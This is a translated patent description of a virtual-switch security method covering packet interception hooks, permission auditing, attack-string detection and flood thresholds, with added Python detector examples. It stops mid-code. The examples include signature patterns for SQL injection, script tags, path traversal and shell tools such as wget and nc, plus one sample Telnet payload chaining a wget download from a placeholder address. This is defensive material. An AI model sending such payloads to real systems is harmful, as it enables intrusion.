Description of the Embodiments
To make the objects, technical solutions and advantages of the embodiments of the present invention clearer, the technical solutions in the embodiments are described below clearly and completely with reference to the accompanying drawings. The described embodiments are only some, not all, of the embodiments of the present invention. All other embodiments obtained by a person of ordinary skill in the art on the basis of these embodiments without creative effort fall within the scope of protection of the present invention.
Fig. 1 is a flow chart of a virtual-switch-based security protection method for a virtualization platform provided by an embodiment of the present invention. As shown in Fig. 1, the method comprises:
Step 101: receiving a packet sent by a first interface in a virtual switch, where the first interface is used to intercept, on a communication link in the virtual switch, a packet sent by a first device to a second device.
A virtualization platform comprises at least one physical machine. By means of virtualization technology one physical machine can host multiple virtual machines, and at least one virtual switch is virtualized on the platform. Each virtual machine can run a different operating system and different applications; virtual machines communicate with each other, and with physical machines, through the virtual switch.
Several kinds of peers communicate on a virtualization platform: a virtual machine sends packets to another virtual machine through the virtual switch, a physical machine sends packets to a virtual machine through the virtual switch, or a virtual machine sends packets to a physical machine through the virtual switch. To explain the method of this embodiment more clearly, it is described for the case where a first device and a second device on the platform communicate through the virtual switch. The first device is a physical machine or a virtual machine, and the second device is likewise a physical machine or a virtual machine.
The first interface is set up in the virtual switch in advance and intercepts, on a communication link in the virtual switch, packets sent by the first device to the second device. The position of the first interface on the link can be chosen according to the application, for example at the entry of the link or at an intermediate position: any point that a packet passes on the link before it leaves the virtual switch can serve as the position of the first interface.
The first interface can be generated in many ways, and this embodiment does not limit the choice. For example, it can be generated in the virtual switch by a hook program, or a pre-built interface can be obtained from the control center of the virtualization platform and installed.
When the first device sends a packet to the second device over the communication link established in advance through the virtual switch, the first interface intercepts the packet on the link and hands it to the data feature library for security detection.
Step 102: using a data feature library to detect whether the packet satisfies a preset network security policy, where the data feature library comprises feature information corresponding to the network security policy.
A data feature library is provided in the virtual switch in advance and holds the feature information corresponding to the network security policy. The network security policy comprises at least one of network permission auditing, network attack detection and traffic intrusion detection; it can be configured according to the network application environment and the service types of the virtual and physical machines, which this embodiment does not limit. Because the policies differ, the content and representation of the corresponding feature information differ as well.
When the data feature library receives, through the first interface, a packet sent by the first device to the second device, it uses the feature information corresponding to the network security policy to detect whether the packet satisfies the preset policy. Because the feature information differs from policy to policy, the detection procedure and the decision criteria differ too; they are described in the subsequent embodiments.
Step 103: if it is determined that the packet satisfies the network security policy, sending the packet that passed security detection to the second device through a second interface in the virtual switch.
If the data feature library determines, from the feature information corresponding to the policy, that the packet satisfies the preset network security policy, the packet poses no network attack threat to the devices on the platform and may leave the virtual switch. The packet that passed security detection is therefore sent to the second interface, which forwards it to the second device.
The second interface forwards packets that have passed security detection by the data feature library. Its position on the communication link can be chosen according to the application, for example at the exit of the link or at any point between the first interface and the exit.
Like the first interface, the second interface can be generated in many ways, which this embodiment does not limit: it can be generated in the virtual switch by a hook program, or a pre-built interface can be obtained from the control center of the virtualization platform and installed.
In the method of this embodiment, the first interface in the virtual switch intercepts, on a communication link in the switch, packets sent by the first device to the second device; the feature information corresponding to the network security policy in the data feature library is used to detect whether the packet is safe; if so, the packet is sent to the second device through the second interface in the virtual switch. Traffic inside the virtual switch therefore need not be diverted to an external system for security detection, which improves the efficiency of detection and reduces the latency of communication.
Fig. 2 is a flow chart of another virtual-switch-based security protection method for a virtualization platform provided by an embodiment of the present invention. This embodiment describes in detail how the first interface and/or the second interface are generated in the virtual switch by a hook program, and how a packet that is detected to be unsafe is handled. As shown in Fig. 2, the method comprises:
Step 201: using a hook program to set, on the communication link, a first registration point for intercepting the packet, and encapsulating the first registration point to establish the first interface; and/or using a hook program to set, on the communication link, a second registration point for forwarding the packet, and encapsulating the second registration point to establish the second interface.
The hook program sets a first registration point for intercepting packets on the communication link of the virtual switch, and the first registration point is encapsulated to establish the first interface. The first registration point is an anchor placed directly on the link for intercepting the packets on it; encapsulating it yields the first interface, which carries the interception function. In other words, the first registration point is marked for interception, so that a packet that reaches it is intercepted.
And/or,
the hook program sets a second registration point for forwarding packets on the communication link, and the second registration point is encapsulated to establish the second interface. The second registration point is an anchor placed directly on the link for forwarding packets after security detection; encapsulating it yields the second interface, which carries the forwarding function. In other words, the second registration point is marked for forwarding, so that a packet that reaches it is forwarded.
Step 202: receiving a packet sent by the first interface in the virtual switch, where the first interface intercepts, on a communication link in the virtual switch, a packet sent by the first device to the second device.
When the first device sends a packet to the second device over the communication link established in advance through the virtual switch, the first interface intercepts the packet on the link and hands it to the data feature library for security detection.
Step 203: using the data feature library to detect whether the packet satisfies the preset network security policy, where the data feature library comprises the feature information corresponding to the policy.
When the data feature library receives, through the first interface, the packet sent by the first device to the second device, it uses the feature information corresponding to the network security policy to detect whether the packet satisfies the preset policy. Because the feature information differs from policy to policy, the detection procedure and the decision criteria differ too; they are described in the subsequent embodiments.
Step 204: if it is determined that the packet satisfies the network security policy, sending the packet that passed security detection to the second device through the second interface in the virtual switch; if it is determined that the packet does not satisfy the network security policy, performing security handling on the packet according to the network threat type in the policy.
If the data feature library determines, from the feature information corresponding to the policy, that the packet satisfies the preset network security policy, the packet poses no network attack threat to the devices on the platform and may leave the virtual switch. The packet that passed security detection is therefore sent to the second interface, which forwards it to the second device.
If the data feature library determines, from the feature information corresponding to the policy, that the packet does not satisfy the network security policy, security handling is performed on the packet according to the network threat type in the policy, so that a packet carrying a network threat cannot leave the virtual switch and reach the second device.
In the method of this embodiment, the first interface set by a hook program in the virtual switch intercepts, on a communication link in the switch, packets sent by the first device to the second device; the feature information corresponding to the network security policy in the data feature library is used to detect whether the packet is safe; if so, the packet is sent to the second device through the second interface set by the hook program; if not, security handling is performed on the packet. Traffic inside the virtual switch therefore need not be diverted to an external system for security detection, which improves the efficiency of detection, reduces the latency of communication and further increases the security of the virtualization platform.
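The registration points of Step 201 and the intercept, detect, forward-or-handle flow of Steps 202 to 204 can be modelled as an in-switch pipeline. The following Python is an added example written for this page; it is not code from the patent or from any virtual switch product. The packet fields, the registration point names `ingress` and `egress`, the sample deny-list policy and all IP addresses are constructed assumptions.

```python
"""Hook-based interception pipeline inside a virtual switch (illustrative)."""
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple

# Verdicts produced by the data feature library.
PASS, DROP, MODIFIED = "PASS", "DROP", "MODIFIED"


@dataclass(frozen=True)
class Packet:
    src_ip: str
    dst_ip: str
    dst_port: int
    payload: bytes = b""


# A policy is a callable: Packet -> (verdict, packet to forward or None).
Policy = Callable[[Packet], Tuple[str, Optional[Packet]]]


class FeatureLibrary:
    """The data feature library: one detector per network security policy."""

    def __init__(self) -> None:
        self._policies: Dict[str, Policy] = {}

    def register(self, name: str, policy: Policy) -> None:
        self._policies[name] = policy

    def inspect(self, pkt: Packet) -> Tuple[str, str, Optional[Packet]]:
        """Run the policies in registration order; the first non-PASS verdict wins.
        Returns (policy name, verdict, packet to forward)."""
        for name, policy in self._policies.items():
            verdict, out = policy(pkt)
            if verdict == DROP:
                return name, DROP, None
            if verdict == MODIFIED:
                # Security handling produced a replacement packet (as in Step 303).
                return name, MODIFIED, out
        return "", PASS, pkt


class VirtualSwitch:
    """A communication link with two registration points set by a 'hook program'.

    The first registration point ("ingress") is encapsulated as the first
    interface: every packet on the link is intercepted there and handed to the
    library. The second registration point ("egress") is the second interface:
    only packets that passed detection (or were repaired) reach it.
    """

    def __init__(self, library: FeatureLibrary) -> None:
        self.library = library
        self.hooks: Dict[str, Callable] = {}
        self.delivered: List[Packet] = []
        self.audit_log: List[Tuple[str, str, str]] = []
        # The hook program installs the two registration points.
        self.register_hook("ingress", self._first_interface)
        self.register_hook("egress", self._second_interface)

    def register_hook(self, point: str, fn: Callable) -> None:
        self.hooks[point] = fn

    def _first_interface(self, pkt: Packet) -> Tuple[str, str, Optional[Packet]]:
        return self.library.inspect(pkt)

    def _second_interface(self, pkt: Packet) -> None:
        self.delivered.append(pkt)

    def transmit(self, pkt: Packet) -> str:
        """Send one packet from the first device towards the second device."""
        policy, verdict, out = self.hooks["ingress"](pkt)
        self.audit_log.append((pkt.src_ip, policy, verdict))
        if verdict in (PASS, MODIFIED):
            self.hooks["egress"](out)   # a dropped packet never reaches egress
        return verdict


# Constructed feature information for a minimal policy: denied source addresses.
DENIED_SOURCES = {"10.0.0.66"}


def deny_list_policy(pkt: Packet) -> Tuple[str, Optional[Packet]]:
    return (DROP, None) if pkt.src_ip in DENIED_SOURCES else (PASS, pkt)


def build_switch() -> VirtualSwitch:
    lib = FeatureLibrary()
    lib.register("deny-list", deny_list_policy)
    return VirtualSwitch(lib)


def demo() -> Tuple[int, int]:
    """Returns (packets delivered, packets dropped) for one good and one denied sender."""
    sw = build_switch()
    sw.transmit(Packet("10.0.0.5", "10.0.0.9", 80, b"GET / HTTP/1.1\r\n\r\n"))
    sw.transmit(Packet("10.0.0.66", "10.0.0.9", 80, b"GET / HTTP/1.1\r\n\r\n"))
    return len(sw.delivered), sum(1 for _, _, v in sw.audit_log if v == DROP)


if __name__ == "__main__":
    print(demo())
```

The detectors of the later embodiments (permission audit, attack-string matching, traffic threshold) each fit the `Policy` signature and can be registered in the same library; the switch itself only knows the two registration points.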
For the embodiment of Fig. 2, the feature information, detection procedure and decision criteria differ from policy to policy. To explain clearly how the data feature library performs security detection on a packet, and how security handling is performed according to the network threat type when a packet is determined not to satisfy the policy, the embodiments of Figs. 3 to 5 describe each policy in turn.
Fig. 3 is a flow chart of another virtual-switch-based security protection method for a virtualization platform provided by an embodiment of the present invention. This embodiment covers the security detection process when the network security policy is network permission auditing, and the security handling of a packet whose network threat type is a permission violation. As shown in Fig. 3, the method comprises:
Step 301: obtaining the network access permission information corresponding to the source IP of the packet.
Specifically, when the network security policy is network permission auditing, the feature information corresponding to the policy comprises IP address information and the network access permission information corresponding to each IP address.
When the data feature library receives the packet sent by the first interface, it parses the packet to obtain its source IP address and destination IP address. It then looks up the stored IP address information and the associated network access permission information to obtain the permission information corresponding to the source IP of the packet.
Step 302: auditing the legitimacy of the destination IP according to the network access permission information.
The legitimacy of the destination IP is audited according to the obtained network access permission information, that is, the permission information is used to determine whether the source IP is allowed to access the network resource corresponding to the destination IP. If it is, the destination IP is legitimate, the packet passes security detection and is sent to the second device through the second interface. If it is not, the destination IP is illegitimate, the packet fails security detection and security handling is required.
Step 303: if it is determined that the destination IP is illegitimate, modifying the destination IP to a permitted IP according to the network access permission information, and sending the modified packet to the second interface.
If the source IP is not allowed to access the network resource corresponding to the destination IP, the destination IP is illegitimate and the packet fails security detection. The destination IP is therefore rewritten to a permitted IP according to the obtained network access permission information, and the modified packet is sent to the second interface, which forwards it to the second device.
In the method of this embodiment, the feature information corresponding to network permission auditing in the data feature library is used to detect whether the packet is safe; if so, the packet is sent to the second device through the second interface in the virtual switch; if not, the packet is modified to carry a permitted access destination before it is forwarded. This improves the security of the virtualization platform.
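The permission audit of Steps 301 to 303 reduces to a longest-prefix lookup of the source IP, a check of the destination against the permitted networks, and a destination rewrite when the check fails. The following Python is an added example written for this page, not code from the patent. The `PERMISSIONS` table, the addresses, the choice of one `rewrite_to` address per entry and the default-deny for sources without an entry are all constructed assumptions; the patent does not say how the permitted IP is selected or what happens to an unknown source.

```python
"""Network permission audit (Steps 301-303) over constructed feature information."""
from ipaddress import ip_address, ip_network
from typing import Dict, Optional, Tuple

# Constructed feature information: source network -> permitted destination
# networks, and the permitted IP that an illegitimate destination is rewritten to.
PERMISSIONS: Dict[str, dict] = {
    "10.0.1.0/24": {"allowed": ("10.0.2.0/24", "10.0.3.10/32"), "rewrite_to": "10.0.3.10"},
    "10.0.9.5/32": {"allowed": ("10.0.9.0/24",), "rewrite_to": "10.0.9.1"},
}


def lookup_permissions(src_ip: str) -> Optional[dict]:
    """Longest-prefix match of the source IP against the stored IP address information."""
    src = ip_address(src_ip)
    best_len, best = -1, None
    for net, perm in PERMISSIONS.items():
        network = ip_network(net)
        # 'in' is False for a mixed IPv4/IPv6 comparison, so no version check is needed.
        if src in network and network.prefixlen > best_len:
            best_len, best = network.prefixlen, perm
    return best


def audit(packet: Dict[str, str]) -> Tuple[str, Optional[Dict[str, str]]]:
    """Return (verdict, packet).

    PASS    - destination is permitted; forward the packet unchanged.
    REWRITE - destination is not permitted; forward a copy whose destination
              was rewritten to the permitted IP (Step 303).
    DROP    - assumption for a source with no permission information.
    """
    perm = lookup_permissions(packet["src_ip"])
    if perm is None:
        return "DROP", None
    dst = ip_address(packet["dst_ip"])
    if any(dst in ip_network(allowed) for allowed in perm["allowed"]):
        return "PASS", packet
    # Keep the original destination alongside the rewritten one so that the
    # redirection is visible in logs rather than silent.
    modified = dict(packet, dst_ip=perm["rewrite_to"], original_dst_ip=packet["dst_ip"])
    return "REWRITE", modified


if __name__ == "__main__":
    for pkt in ({"src_ip": "10.0.1.7", "dst_ip": "10.0.2.3"},
                {"src_ip": "10.0.1.7", "dst_ip": "10.0.5.5"},
                {"src_ip": "192.168.1.1", "dst_ip": "10.0.2.3"}):
        print(pkt, "->", audit(pkt))
```

Because Step 303 forwards a packet whose destination differs from the one the sender chose, the `original_dst_ip` field is the piece a practitioner would insist on: without it the redirection cannot be audited or explained to the sender.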
Fig. 4 is a flow chart of another virtual-switch-based security protection method for a virtualization platform provided by an embodiment of the present invention. This embodiment covers the security detection process when the network security policy is network attack detection, and the security handling of a packet whose network threat type is a network attack. As shown in Fig. 4, the method comprises:
Step 401: determining the communication protocol used by the packet.
Specifically, when the network security policy is network attack detection, the feature information corresponding to the policy comprises the key fields corresponding to the communication protocol of the packet, and descriptions of attack strings.
When the data feature library receives the packet sent by the first interface, it parses the packet to determine the communication protocol it uses; the protocol is obtained from the header information of the packet. The communication protocol comprises, for example, the Hypertext Transfer Protocol (HTTP), the standard remote login protocol (Telnet) and the Simple Mail Transfer Protocol (SMTP).
Step 402: obtaining the data in the key fields corresponding to the communication protocol, and determining whether the data in the key fields contains an attack string description.
The stored feature information is queried for the key fields corresponding to the packet's communication protocol and for the attack string descriptions. The data in those key fields is extracted, and it is determined whether it contains any of the attack strings that the feature information associates with that protocol. If it does not, the packet passes security detection and is sent to the second device through the second interface. If it does, the packet fails security detection and security handling is required.
Step 403: if it is determined that the data in the key fields contains an attack string description, discarding the packet; or filtering the packet to obtain a packet that satisfies the network security policy and sending it to the second interface.
If the data in the key fields contains an attack string description, the packet fails security detection and is discarded; or the packet is filtered to obtain a packet that satisfies the network security policy, which is sent to the second interface and forwarded to the second device.
In the method of this embodiment, the feature information corresponding to network attack detection in the data feature library is used to detect whether the packet is safe; if so, the packet is sent to the second device through the second interface in the virtual switch; if not, the packet is discarded or filtered. This improves the security of the virtualization platform.
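Steps 401 to 403 amount to: pick the protocol from the header, parse only that protocol's key fields, and match the attack strings stored for it; the filtering alternative strips the matched strings and re-checks. The following Python is an added example written for this page, not code from the patent. The port-to-protocol mapping, the key fields, the attack-string patterns, the parsers and the sample payloads are constructed assumptions chosen to illustrate the three protocols the text names (HTTP, Telnet, SMTP).

```python
"""Network attack detection (Steps 401-403): per-protocol key fields and attack strings."""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote_to_bytes

# Assumption: the protocol is read from the destination port in the packet header.
PORT_TO_PROTOCOL = {80: "HTTP", 23: "TELNET", 25: "SMTP"}

# Constructed feature information: which fields of each protocol are inspected ...
KEY_FIELDS = {
    "HTTP": ("request_line", "User-Agent", "Cookie", "body"),
    "TELNET": ("input",),
    "SMTP": ("MAIL FROM", "RCPT TO"),
}
# ... and the attack string descriptions (here: regular expressions) per protocol.
ATTACK_STRINGS: Dict[str, List] = {
    "HTTP": [re.compile(rb"(?i)\bunion\b\s+(?:all\s+)?select\b"),   # SQL injection
             re.compile(rb"(?i)<script\b"),                          # reflected script
             re.compile(rb"\.\./")],                                 # path traversal
    "TELNET": [re.compile(rb"[;&|]\s*(?:rm|wget|curl|nc)\b")],      # chained download/exec
    "SMTP": [re.compile(rb"[|`$]")],                                 # shell metacharacters in envelope
}


def parse_http(raw: bytes) -> Dict[str, bytes]:
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    # Percent-decode the request line so encoded payloads are matched too.
    fields = {"request_line": unquote_to_bytes(lines[0]), "body": body}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep:
            fields[name.strip().decode("ascii", "replace")] = value.strip()
    return fields


def parse_smtp(raw: bytes) -> Dict[str, bytes]:
    fields: Dict[str, bytes] = {}
    for line in raw.split(b"\r\n"):
        for verb in (b"MAIL FROM", b"RCPT TO"):
            if line.upper().startswith(verb):
                fields[verb.decode()] = line[len(verb):].lstrip(b": ")
    return fields


def parse_telnet(raw: bytes) -> Dict[str, bytes]:
    return {"input": raw}


PARSERS = {"HTTP": parse_http, "TELNET": parse_telnet, "SMTP": parse_smtp}


def detect(packet: dict) -> Tuple[str, Optional[Tuple[str, bytes]]]:
    """Step 401/402: ("PASS", None) or ("ATTACK", (key field, matched bytes))."""
    proto = PORT_TO_PROTOCOL.get(packet["dst_port"])
    if proto is None:
        return "PASS", None          # no key fields are defined for this protocol
    fields = PARSERS[proto](packet["payload"])
    for name in KEY_FIELDS[proto]:
        data = fields.get(name)
        if data is None:
            continue
        for pattern in ATTACK_STRINGS[proto]:
            match = pattern.search(data)
            if match:
                return "ATTACK", (name, match.group(0))
    return "PASS", None


def handle(packet: dict, mode: str = "drop") -> Tuple[str, Optional[dict]]:
    """Step 403: discard the packet, or filter it until it satisfies the policy."""
    verdict, _ = detect(packet)
    if verdict == "PASS":
        return "PASS", packet
    if mode == "drop":
        return "DROP", None
    payload = packet["payload"]
    for pattern in ATTACK_STRINGS[PORT_TO_PROTOCOL[packet["dst_port"]]]:
        payload = pattern.sub(b"", payload)      # strip every attack string
    filtered = dict(packet, payload=payload)
    # Re-run detection: if the filtered packet still matches, fall back to dropping.
    return ("FILTERED", filtered) if detect(filtered)[0] == "PASS" else ("DROP", None)


if __name__ == "__main__":
    sample = {"dst_port": 23, "payload": b"ls /tmp; wget http://203.0.113.9/x\r\n"}  # constructed
    print(detect(sample), handle(sample, mode="filter"))
```

Filtering is only meaningful when removing the matched bytes leaves a packet the receiver can still parse; the re-check after stripping is what keeps a half-removed attack string from being forwarded.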
Fig. 5 is a flow chart of another virtual-switch-based security protection method for a virtualization platform provided by an embodiment of the present invention. This embodiment covers the security detection process when the network security policy is traffic intrusion detection, and the security handling of a packet whose network threat type is traffic intrusion. As shown in Fig. 5, the method comprises:
Step 501: matching the header information, body format and trailer format of the packet against the format information in the feature information.
Specifically, when the network security policy is traffic intrusion detection, the feature information corresponding to the policy comprises packet format information and a traffic threshold within a preset time corresponding to that format information, where the format information comprises at least one of header information, body format and trailer format.
When the data feature library receives the packet sent by the first interface, it parses the packet and matches its header information, body format and trailer format against the format information in the feature information. Take the data format of a DDoS attack as an example: if the traffic of packets in that format within the preset time exceeds the preset traffic threshold, the purpose is evidently to consume a large amount of the processing resources of the target device and crash its system.
Step 502: determining whether the traffic of the matched packets within the preset time exceeds the preset traffic threshold.
The stored feature information is queried to determine whether the traffic of the packets that matched the format within the preset time exceeds the preset traffic threshold. If it does not exceed the threshold, the packet passes security detection and is sent to the second device through the second interface. If it exceeds the threshold, the packet fails security detection and security handling is required.
Step 503: if it is determined that the traffic of the matched packets within the preset time exceeds the traffic threshold, discarding the packet.
If the traffic of the matched packets within the preset time exceeds the traffic threshold, the packet fails security detection and is therefore discarded.
In the method of this embodiment, the feature information corresponding to traffic intrusion detection in the data feature library is used to detect whether the packet is safe; if so, the packet is sent to the second device through the second interface in the virtual switch; if not, the packet is discarded. This improves the security of the virtualization platform.
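Steps 501 to 503 combine a format match (header, body, trailer) with a count of matched packets in a sliding time window. The following Python is an added example written for this page, not code from the patent. The two format signatures, the thresholds, the decision to count packets rather than bytes, and the choice to keep one window per (signature, destination IP) are constructed assumptions; the DNS query bytes are built by hand for the example.

```python
"""Traffic intrusion detection (Steps 501-503): format matching plus a sliding-window threshold."""
from collections import defaultdict, deque
from typing import Deque, Dict, Optional, Tuple

# Constructed format information. A signature may constrain the header (exact
# field values), the body (maximum length and/or bytes at an offset) and the
# trailer (trailing bytes). A part that is absent from the signature is not checked.
FORMAT_SIGNATURES: Dict[str, dict] = {
    "tcp-syn-flood": {
        "header": {"proto": "TCP", "flags": "S"},
        "body": {"max_len": 0},
    },
    "dns-any-query-flood": {
        "header": {"proto": "UDP", "dst_port": 53},
        # QDCOUNT=1, ANCOUNT=NSCOUNT=ARCOUNT=0 immediately after the 4-byte ID/flags
        "body": {"at": (4, b"\x00\x01\x00\x00\x00\x00\x00\x00")},
        "trailer": b"\x00\xff\x00\x01",           # QTYPE=ANY, QCLASS=IN
    },
}

# Constructed thresholds: (preset time in seconds, maximum matched packets).
THRESHOLDS = {"tcp-syn-flood": (1.0, 100), "dns-any-query-flood": (1.0, 50)}


def matches_format(pkt: dict, sig: dict) -> bool:
    """Step 501: match header information, body format and trailer format."""
    if any(pkt["header"].get(k) != v for k, v in sig.get("header", {}).items()):
        return False
    body, spec = pkt["body"], sig.get("body", {})
    if "max_len" in spec and len(body) > spec["max_len"]:
        return False
    if "at" in spec:
        offset, expected = spec["at"]
        if body[offset:offset + len(expected)] != expected:
            return False
    trailer = sig.get("trailer")
    return trailer is None or body.endswith(trailer)


def classify(pkt: dict) -> Optional[str]:
    for name, sig in FORMAT_SIGNATURES.items():
        if matches_format(pkt, sig):
            return name
    return None


class FloodDetector:
    """Steps 502/503: count matched packets per (signature, destination) in a sliding window."""

    def __init__(self, thresholds: Dict[str, Tuple[float, int]] = THRESHOLDS) -> None:
        self.thresholds = thresholds
        self.windows: Dict[Tuple[str, str], Deque[float]] = defaultdict(deque)

    def inspect(self, pkt: dict, now: float) -> Tuple[str, Optional[str]]:
        """Return ("PASS" | "DROP", matched signature or None). `now` is in seconds."""
        name = classify(pkt)
        if name is None:
            return "PASS", None
        window, limit = self.thresholds[name]
        times = self.windows[(name, pkt["header"]["dst_ip"])]
        while times and now - times[0] > window:     # expire packets outside the preset time
            times.popleft()
        times.append(now)                             # dropped packets still count as traffic
        # Strictly exceeding the threshold fails detection; reaching it is still allowed.
        return ("DROP", name) if len(times) > limit else ("PASS", name)


if __name__ == "__main__":
    det = FloodDetector({"tcp-syn-flood": (1.0, 3), "dns-any-query-flood": (1.0, 2)})
    syn = {"header": {"proto": "TCP", "flags": "S", "src_ip": "203.0.113.5", "dst_ip": "10.0.2.3"}, "body": b""}
    print([det.inspect(syn, t) for t in (0.0, 0.1, 0.2, 0.3, 1.5)])
```

The window is keyed by destination because the threat the text describes is exhaustion of the target device; keying by source instead would let a distributed attack stay under the threshold per sender.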
Fig. 6 is a schematic structural diagram of a virtual-switch-based security protection apparatus for a virtualization platform provided by an embodiment of the present invention. As shown in Fig. 6, the apparatus comprises a receiving module 11, a detection module 12 and a sending module 13, where:
the receiving module 11 is configured to receive a packet sent by a first interface in a virtual switch, the first interface intercepting, on a communication link in the virtual switch, a packet sent by a first device to a second device;
the detection module 12 is configured to use a data feature library to detect whether the packet satisfies a preset network security policy, the data feature library comprising feature information corresponding to the network security policy;
the sending module 13 is configured to send the packet that passed security detection to the second device through a second interface in the virtual switch if it is determined that the packet satisfies the network security policy.
The functions and processing flow of the modules of the apparatus of this embodiment can be found in the method embodiment of Fig. 1; the implementation principle is similar and is not repeated here.
In the apparatus of this embodiment, the first interface in the virtual switch intercepts, on a communication link in the switch, packets sent by the first device to the second device; the feature information corresponding to the network security policy in the data feature library is used to detect whether the packet is safe; if so, the packet is sent to the second device through the second interface in the virtual switch. Traffic inside the virtual switch therefore need not be diverted to an external system for security detection, which improves the efficiency of detection and reduces the latency of communication.
Fig. 7 is a schematic structural diagram of another virtual-switch-based security protection apparatus for a virtualization platform provided by an embodiment of the present invention. As shown in Fig. 7, on the basis of the embodiment of Fig. 6 the apparatus further comprises a setting module 14 and a processing module 15, where:
the setting module 14 is configured to use a hook program to set, on the communication link, a first registration point for intercepting the packet and to encapsulate the first registration point to establish the first interface; and/or to use a hook program to set, on the communication link, a second registration point for forwarding the packet and to encapsulate the second registration point to establish the second interface;
the processing module 15 is configured to perform security handling on the packet according to the network threat type in the network security policy if it is determined that the packet does not satisfy the policy.
The functions and processing flow of the modules of the apparatus of this embodiment can be found in the method embodiment of Fig. 2; the implementation principle is similar and is not repeated here.
In the apparatus of this embodiment, the first interface set by a hook program in the virtual switch intercepts, on a communication link in the switch, packets sent by the first device to the second device; the feature information corresponding to the network security policy in the data feature library is used to detect whether the packet is safe; if so, the packet is sent to the second device through the second interface set by the hook program; if not, security handling is performed on the packet. Traffic inside the virtual switch therefore need not be diverted to an external system for security detection, which improves the efficiency of detection, reduces the latency of communication and further increases the security of the virtualization platform.
Fig. 8 is a schematic structural diagram of another virtual-switch-based security protection apparatus for a virtualization platform provided by an embodiment of the present invention. In this embodiment the network security policy is network permission auditing, and the feature information corresponding to the policy comprises IP address information and the network access permission information corresponding to each IP address. As shown in Fig. 8, on the basis of the embodiment of Fig. 7 the detection module 12 comprises an obtaining unit 121 and an auditing unit 122, where:
the obtaining unit 121 is configured to obtain the network access permission information corresponding to the source IP of the packet;
the auditing unit 122 is configured to audit the legitimacy of the destination IP according to the network access permission information;
the processing module 15 is specifically configured to:
modify the destination IP to a permitted IP according to the network access permission information if it is determined that the destination IP is illegitimate, and send the modified packet to the second interface.
The functions and processing flow of the modules of the apparatus of this embodiment can be found in the method embodiment of Fig. 3; the implementation principle is similar and is not repeated here.
In the apparatus of this embodiment, the feature information corresponding to network permission auditing in the data feature library is used to detect whether the packet is safe; if so, the packet is sent to the second device through the second interface in the virtual switch; if not, the packet is modified to carry a permitted access destination before it is forwarded. This improves the security of the virtualization platform.
Fig. 9 is a schematic structural diagram of another virtual-switch-based security protection apparatus for a virtualization platform provided by an embodiment of the present invention. In this embodiment the network security policy is network attack detection, and the feature information corresponding to the policy comprises the key fields corresponding to the communication protocol of the packet and descriptions of attack strings. As shown in Fig. 9, on the basis of the embodiment of Fig. 7 the detection module 12 comprises a determining unit 123 and a first judging unit 124, where:
the determining unit 123 is configured to determine the communication protocol used by the packet;
the first judging unit 124 is configured to obtain the data in the key fields corresponding to the communication protocol and to determine whether the data in the key fields contains an attack string description;
the processing module 15 is specifically configured to:
discard the packet if it is determined that the data in the key fields contains an attack string description; or filter the packet to obtain a packet that satisfies the network security policy and send it to the second interface.
The functions and processing flow of the modules of the apparatus of this embodiment can be found in the method embodiment of Fig. 4; the implementation principle is similar and is not repeated here.
In the apparatus of this embodiment, the feature information corresponding to network attack detection in the data feature library is used to detect whether the packet is safe; if so, the packet is sent to the second device through the second interface in the virtual switch; if not, the packet is discarded or filtered. This improves the security of the virtualization platform.
Fig. 10 is a schematic structural diagram of another virtual-switch-based virtual platform security protection apparatus provided by an embodiment of the present invention, in which the network security policy is flow intrusion and the feature information corresponding to the network security policy comprises: format information of the packet, and a flow threshold within a preset time corresponding to the format information, wherein the format information comprises at least one of the header information, the format of the intermediate (payload) portion and the format of the trailer portion. As shown in Fig. 10, on the basis of the embodiment shown in Fig. 7, the detection module 12 comprises a matching unit 125 and a second judging unit 126, wherein:
the matching unit 125 is configured to match the header information, the intermediate-portion format and the trailer format of the packet against the format information in the feature information;
the second judging unit 126 is configured to judge whether the flow of successfully matched packets within the preset time exceeds the preset flow threshold;
the processing module 15 is specifically configured to:
if it is judged that the flow of successfully matched packets within the preset time exceeds the flow threshold, discard the packet.
For the functions and processing flow of the modules of the virtual-switch-based virtual platform security protection apparatus provided by this embodiment, reference may be made to the method embodiment shown in Fig. 3 above; the implementation principle is similar and is not repeated here.
The virtual-switch-based virtual platform security protection apparatus provided by this embodiment uses the feature information in the data feature library corresponding to flow intrusion to detect whether a packet is safe; if so, the packet is sent to the second device through the second interface of the virtual switch, and if not, the packet is discarded, thereby improving the security of the virtual platform.
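The detection and processing logic of the Fig. 9 and Fig. 10 embodiments, written out as an added example (this is not code from the patent). The contents of the data feature library, the parsed packet fields, the format patterns and the flow threshold are all assumptions chosen for illustration; the attack-string check is done case-insensitively on the key fields of the protocol the packet uses, and the flow check keeps a sliding window of matched packets per configured format.

```python
"""Detection logic of the Fig. 9 (network attack detection) and Fig. 10 (flow
intrusion) embodiments, as an added example; the feature library contents,
packet fields and thresholds below are assumptions for illustration."""
import re
from collections import deque
from dataclasses import dataclass, field


@dataclass
class Packet:
    protocol: str                                # communication protocol the packet uses
    fields: dict = field(default_factory=dict)   # parsed key fields, e.g. {"uri": "..."}
    header: bytes = b""                          # header portion of the packet format
    body: bytes = b""                            # intermediate (payload) portion
    trailer: bytes = b""                         # trailer portion
    ts: float = 0.0                              # arrival time in seconds

    def size(self):
        return len(self.header) + len(self.body) + len(self.trailer)


# Data feature library for network attack detection (assumed contents): per
# protocol, the key field(s) to inspect and the attack-string descriptors.
ATTACK_FEATURES = {
    "http": {"key_fields": ["uri", "body"],
             "attack_strings": ["' or 1=1", "<script>", "../"]},
    "smtp": {"key_fields": ["subject", "body"],
             "attack_strings": ["<script>"]},
}


def detect_attack(pkt):
    """Determining unit + first judging unit: look up the key fields for the
    packet's protocol and return the first attack descriptor found, else None."""
    feat = ATTACK_FEATURES.get(pkt.protocol)
    if feat is None:
        return None                  # no key field is defined for this protocol
    for name in feat["key_fields"]:
        data = str(pkt.fields.get(name, "")).lower()
        for sig in feat["attack_strings"]:
            if sig in data:
                return sig
    return None


def filter_attack(pkt, sig):
    """Processing module, filter branch: strip the matched attack descriptor
    from every key field so the packet meets the policy; returns a new Packet."""
    cleaned = dict(pkt.fields)
    for name in ATTACK_FEATURES[pkt.protocol]["key_fields"]:
        if name in cleaned:
            cleaned[name] = re.sub(re.escape(sig), "", str(cleaned[name]),
                                   flags=re.IGNORECASE)
    return Packet(pkt.protocol, cleaned, pkt.header, pkt.body, pkt.trailer, pkt.ts)


# Data feature library for flow intrusion (assumed contents): a packet format
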